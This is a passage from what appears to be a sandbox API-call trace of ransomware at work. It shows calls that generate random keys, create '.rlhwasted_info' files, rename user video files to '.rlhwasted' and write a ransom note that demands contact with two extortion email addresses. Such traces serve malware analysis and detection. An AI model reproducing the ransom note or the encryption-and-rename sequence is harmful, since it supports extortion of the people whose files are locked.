KEY:\r\n[begin_key]Uhu9Z4O2vfU1OZReSek2QAMAGR0fDEdG3HRbmlowYbZeSLFPLdxew4By7AtXRlQ9\r\niFOfecVsJ3yG9qgUFaO3Jfkocoqn+cM3J6BX3qXUMBqNOZNNFJqldgnQ+EDj4/rl\r\nkLLJILb7hWxwAXOPnzdHkIiH3SPryjd2xcf7jFREeYHoVN40FD7UitwULDHdRT5N\r\nKBKjfXOOJgeXoypgsiGaW41+Vo5BCfhOe3cdTTKJE4NCO6agsbCtLAyVlDJRdT3n\r\nZheNkWFLArwgKVPUnVXFpxbGdKXkTaG563UwWhaW0icmHA9RQHxm6lKYuslc2ybE\r\n1LIYSzNK0TGb5VYoJsXEys4P7n4fpW7qE84H2KbwDiXYGLm3FlMxvVaK5Rz2bDg0\r\ncJGf2R774gjZkCOrBNHrx+0IFZBVOM/BzIKbkQbDhooultwSnwUvlloxTxBtU0V+\r\nNtowQf2LZ94xV1Gle+jpVaOG99cMygSaZcWQNpJxITSoFAbyGtp2aNIWnVFdU1Ro\r\nmFAUhff5hvFc8h1aBUYg6SyPx3pZf9WhzERgBXeMv6qzbDDN28NQ3Bzsjnp+bTvz\r\nWRQeWX0aTJwGQ5V5dM/VQxwy0J0U5lTif0ZNjyDXi6QuwooXRnDr4NlOQFmx7nvd\r\nw9l/t0//t5G5cfXo3qtdCMkXFETMMMYiRTnoVuuq2w+=[end_key]\r\nKEEP IT\r\n") returned 981 [0197.470] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d5420 | out: hHeap=0x6b0000) returned 1 [0197.470] WriteFile (in: hFile=0x104, lpBuffer=0x715c88*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x112fe38, lpOverlapped=0x0 | out: lpBuffer=0x715c88*, lpNumberOfBytesWritten=0x112fe38*=0x7aa, lpOverlapped=0x0) returned 1 [0197.470] SetEndOfFile (hFile=0x104) returned 1 [0197.472] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x715c88 | out: hHeap=0x6b0000) returned 1 [0197.472] CloseHandle (hObject=0x104) returned 1 [0197.491] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7988 | out: hHeap=0x6b0000) returned 1 [0197.491] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x715380 | out: hHeap=0x6b0000) returned 1 [0197.491] _aulldvrm () returned 0x0 [0197.491] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f4f10) returned 1 [0197.492] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0197.492] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.492] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\dYFbqatwM\\dKNfjQUJ\\K2vYgAhv.flv") returned 109 [0197.492] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2e4) returned 0x6e7988 [0197.492] lstrcpyW (in: lpString1=0x6e7a62, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0197.492] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0197.492] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f4f10) returned 1 [0197.493] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x703f50 | out: pbBuffer=0x703f50) returned 1 [0197.493] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.493] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\dYFbqatwM\\dKNfjQUJ\\K2vYgAhv.flv.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\dyfbqatwm\\dknfjquj\\k2vygahv.flv.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0197.493] WriteFile (in: hFile=0x104, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0197.494] SetEndOfFile (hFile=0x104) returned 1 [0197.494] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.494] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0197.495] lstrcpyW (in: lpString1=0x6e7a62, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0197.495] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\dYFbqatwM\\dKNfjQUJ\\K2vYgAhv.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\dyfbqatwm\\dknfjquj\\k2vygahv.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\dYFbqatwM\\dKNfjQUJ\\K2vYgAhv.flv.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\dyfbqatwm\\dknfjquj\\k2vygahv.flv.rlhwasted")) returned 1 [0197.495] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\dYFbqatwM\\dKNfjQUJ\\K2vYgAhv.flv.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\dyfbqatwm\\dknfjquj\\k2vygahv.flv.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0197.496] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0197.496] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x11f5f [0197.496] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11f5f) returned 0xb00000 [0197.496] CloseHandle (hObject=0x124) returned 1 [0197.501] UnmapViewOfFile (lpBaseAddress=0xb00000) returned 1 [0197.501] CloseHandle (hObject=0x128) returned 1 [0197.501] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x707f58 [0197.501] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f4f10) returned 1 [0197.502] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x707fa0 | out: pbBuffer=0x707fa0) returned 1 [0197.502] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.502] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f4f10) returned 1 [0197.503] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0197.503] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.512] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6d5420 [0197.512] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x707f58 | out: hHeap=0x6b0000) returned 1 [0197.512] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0197.512] _snwprintf (in: _Dest=0x703f50, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]mhiaSVgVqvsxgwRU8HR5imE1qAY1ObvmKvWjGD9cYPL1P1W+0BSnKQurZ3abGrNZ\r\nfN5zcCVaO4oBw6LAYvitG0dnz23rEq24KqhzXr/ijYiC0qsZrr6e3JkIVJQYD6w5\r\nXDGj+qkwVyH1Mg3urhVc92fLaey2xqJP0bH7e3pcQX51lhFwCeMYQVgrnNrgrA1d\r\nREohyqaAB4HX42UcvboIvfNzDWyka5yQO8cz8T+klBb2Ar9D20qRegFKi842mf+g\r\nU4+iED6/H43KvAgB0VXDGeW3H3LLCtKkrQnXjjQ2vrlRI0U1K9OAOUGQhngNTtK6\r\nKebjhabtvPOisQ9jJPQEKZDGIXu6R97k0qAMtKiSMkNsvAz0AjHzyl5fzQR3e7h4\r\nZVxSVRhtwcdQvF3aT9nI759KY1f/BfG7ElYayuenRmfGv076wXobo6eGxABhdN6s\r\n8VXlL/QwEejnsT1wAC9ZD5sAlzOTe+16ATL7wd5tBhckZ1WdN+MgBEbJXRZfriXH\r\nJcI+9YJ6gz9nh0FRdVbSrqbWuUIfqs88DPU1m3qQEI6Ffgiaz5vfaJrJlrOpftuq\r\nidO/7acjl5jV3JMZZLfmbrI0klbDJHezLE+T6cuwGgLanrU4Wr8wKoL0NrrbWh4L\r\nXyM48ZNumFH1UOorJZH8oI3Uf5yULd3HOzHXG37hy5T=[end_key]\r\nKEEP IT\r\n") returned 981 [0197.512] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d5420 | out: hHeap=0x6b0000) returned 1 [0197.512] WriteFile (in: hFile=0x104, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x112fe38, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x112fe38*=0x7aa, lpOverlapped=0x0) returned 1 [0197.512] SetEndOfFile (hFile=0x104) returned 1 [0197.514] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0197.514] CloseHandle (hObject=0x104) returned 1 [0197.516] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7988 | out: hHeap=0x6b0000) returned 1 [0197.516] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x7154c0 | out: hHeap=0x6b0000) returned 1 [0197.516] _aulldvrm () returned 0x0 [0197.516] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f6f10) returned 1 [0197.517] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0197.517] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0197.517] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\dYFbqatwM\\Gxp4I0DkC8Jc4mAEt6\\hMlZ.avi") returned 115 [0197.517] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2f0) returned 0x6e7988 [0197.518] lstrcpyW (in: lpString1=0x6e7a6e, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0197.518] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0197.518] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f6f10) returned 1 [0197.519] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x703f50 | out: pbBuffer=0x703f50) returned 1 [0197.519] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0197.519] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\dYFbqatwM\\Gxp4I0DkC8Jc4mAEt6\\hMlZ.avi.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\dyfbqatwm\\gxp4i0dkc8jc4maet6\\hmlz.avi.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0197.520] WriteFile (in: hFile=0x104, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0197.521] SetEndOfFile (hFile=0x104) returned 1 [0197.521] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.521] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0197.521] lstrcpyW (in: lpString1=0x6e7a6e, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0197.521] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\dYFbqatwM\\Gxp4I0DkC8Jc4mAEt6\\hMlZ.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\dyfbqatwm\\gxp4i0dkc8jc4maet6\\hmlz.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\dYFbqatwM\\Gxp4I0DkC8Jc4mAEt6\\hMlZ.avi.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\dyfbqatwm\\gxp4i0dkc8jc4maet6\\hmlz.avi.rlhwasted")) returned 1 [0197.523] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\dYFbqatwM\\Gxp4I0DkC8Jc4mAEt6\\hMlZ.avi.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\dyfbqatwm\\gxp4i0dkc8jc4maet6\\hmlz.avi.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0197.523] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0197.523] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x163b1 [0197.523] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x163b1) returned 0xb00000 [0197.523] CloseHandle (hObject=0x128) returned 1 [0197.528] UnmapViewOfFile (lpBaseAddress=0xb00000) returned 1 [0197.529] CloseHandle (hObject=0x124) returned 1 [0197.529] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x715380 [0197.529] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f6f10) returned 1 [0197.529] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x7153c8 | out: pbBuffer=0x7153c8) returned 1 [0197.529] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0197.530] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f6f10) returned 1 [0197.530] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0197.530] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0197.538] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6d5420 [0197.538] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x715380 | out: hHeap=0x6b0000) returned 1 [0197.538] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0197.538] _snwprintf (in: _Dest=0x703f50, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]MYXBJxK05dcWYY3BUMgJunhIVa50L4fJIaeW/ydK8idrfW8dVsqQ2M3qI8WFMcRk\r\nsdyJ82FI+qKZg0iWclf0WHZNgV5jpJC1CwG0ydZP3YClXnJv+9Z2JoHDkyEobZ0f\r\nW9i9QrxcApOuh6B/aq0EzFqB4G8tdolYd+Ousf5DfntkeTH/VM+Iki/Wro4kSYQY\r\nMYX+2kNc8dTgCqFyl+2MOBxU5/J96jokHzuypM2NMB616xCYwNXXQrc7F0YfcJwr\r\nl8oL8v+Rzc24HWHI5vXD1armoT+6RG37EN8MCZNsC9a9tyC+t6Bj7uYqAbi0/JAu\r\npArXR04cmyEDi81gILQmty8I0p7XE4K81TRF17E/euBnecPXMSqPPRx0YM7qWVGb\r\nwkQzBMMXhrFWJC6fkDLTsilcfIQkHSBsbgaE7pWbcDGHZjIdzFTyvcNXrl+A+QJi\r\nzF2S0FnCcpPAp4FK9QqEowAjW0q0/4yIKAJQbyWJ7Yb0310c77TiXo96yzjp+rHd\r\nqj3CGIs9IXweHkrwj2/Y4bpDw5EqVIg8+qKDaUKFOE/HcQHU1yzHt+w07D0CbS5R\r\n4FGmFFSUycnO/p+z7k38qrpaWX4o5eBDn79FsIBbUetzH9GQQXM7tBNxdKHYrFiu\r\n35L3CN7RsXGV2C3JxQmJczlKBRxc4jAft5wuIiChZHK=[end_key]\r\nKEEP IT\r\n") returned 981 [0197.538] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d5420 | out: hHeap=0x6b0000) returned 1 [0197.538] WriteFile (in: hFile=0x104, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x112fe38, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x112fe38*=0x7aa, lpOverlapped=0x0) returned 1 [0197.539] SetEndOfFile (hFile=0x104) returned 1 [0197.586] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0197.586] CloseHandle (hObject=0x104) returned 1 [0197.589] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7988 | out: hHeap=0x6b0000) returned 1 [0197.589] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x7155f8 | out: hHeap=0x6b0000) returned 1 [0197.589] _aulldvrm () returned 0x0 [0197.589] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f4f10) returned 1 [0197.590] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0197.590] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.590] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\dYFbqatwM\\Gxp4I0DkC8Jc4mAEt6\\vTlu8gb7Eko0gQ6.avi") returned 126 [0197.590] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x306) returned 0x6e7988 [0197.590] lstrcpyW (in: lpString1=0x6e7a84, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0197.590] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0197.590] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f4f10) returned 1 [0197.591] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x703f50 | out: pbBuffer=0x703f50) returned 1 [0197.591] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.591] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\dYFbqatwM\\Gxp4I0DkC8Jc4mAEt6\\vTlu8gb7Eko0gQ6.avi.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\dyfbqatwm\\gxp4i0dkc8jc4maet6\\vtlu8gb7eko0gq6.avi.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0197.592] WriteFile (in: hFile=0x104, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0197.594] SetEndOfFile (hFile=0x104) returned 1 [0197.594] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.594] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0197.594] lstrcpyW (in: lpString1=0x6e7a84, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0197.594] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\dYFbqatwM\\Gxp4I0DkC8Jc4mAEt6\\vTlu8gb7Eko0gQ6.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\dyfbqatwm\\gxp4i0dkc8jc4maet6\\vtlu8gb7eko0gq6.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\dYFbqatwM\\Gxp4I0DkC8Jc4mAEt6\\vTlu8gb7Eko0gQ6.avi.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\dyfbqatwm\\gxp4i0dkc8jc4maet6\\vtlu8gb7eko0gq6.avi.rlhwasted")) returned 1 [0197.595] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\dYFbqatwM\\Gxp4I0DkC8Jc4mAEt6\\vTlu8gb7Eko0gQ6.avi.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\dyfbqatwm\\gxp4i0dkc8jc4maet6\\vtlu8gb7eko0gq6.avi.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0197.595] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0197.596] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x7420 [0197.596] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7420) returned 0x6a0000 [0197.596] CloseHandle (hObject=0x128) returned 1 [0197.600] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0197.600] CloseHandle (hObject=0x124) returned 1 [0197.600] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0197.600] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f6f10) returned 1 [0197.602] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0197.602] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0197.602] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f6f10) returned 1 [0197.603] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0197.603] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0197.611] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x7166c8 [0197.611] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0197.611] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0197.612] _snwprintf (in: _Dest=0x703f50, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD 